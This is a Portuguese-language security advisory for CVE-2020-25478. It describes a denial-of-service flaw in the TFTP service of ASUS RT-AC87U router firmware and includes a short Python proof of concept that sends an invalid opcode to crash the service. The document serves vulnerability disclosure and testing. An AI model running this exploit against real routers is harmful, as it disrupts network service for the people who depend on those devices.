
ASUS RT-AC87U TFTP é vulnerável a ataque de Negação de Serviço (DoS)
CVE-2020-25478 - ASUS RT-AC87U TFTP é vulnerável a ataques de Negação de Serviço (DoS)
ASUS RT-AC87U 3.0.0.4.382_51640
Está principalmente relacionado à CWE-20: o serviço TFTP em execução no ASUS RT-AC87U é vulnerável a ataques de Negação de Serviço (DoS) quando um opcode inválido é enviado ao serviço. O seguinte trecho de código Python é usado para testar a vulnerabilidade:
import socket
import sys
tftpd = ('192.168.1.1', 69)
#Try and open an UDP SOCKET
try:
tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print("Failed on socket creation, so exiting")
sys.exit(1)
#create a invalid opcode exeeding the 2 byte length
# opcode operation
# 1 Read request (RRQ)
# 2 Write request (WRQ)
# 3 Data (DATA)
# 4 Acknowledgment (ACK)
# 5 Error (ERROR)
invalidOpcode = "0000"
tftp.sendto(invalidOpcode,tftpd)
3. DESCRIÇÃO
O Asus RT-AC87U versão 3.0.0.4.382_51640 é vulnerável a ataques de negação de serviço no serviço TFTP, fazendo com que o serviço TFTP trave. O serviço TFTP está sujeito a travar remotamente quando um opcode inválido é enviado.
https://www.asus.com/content/ASUS-Product-Security-Advisory/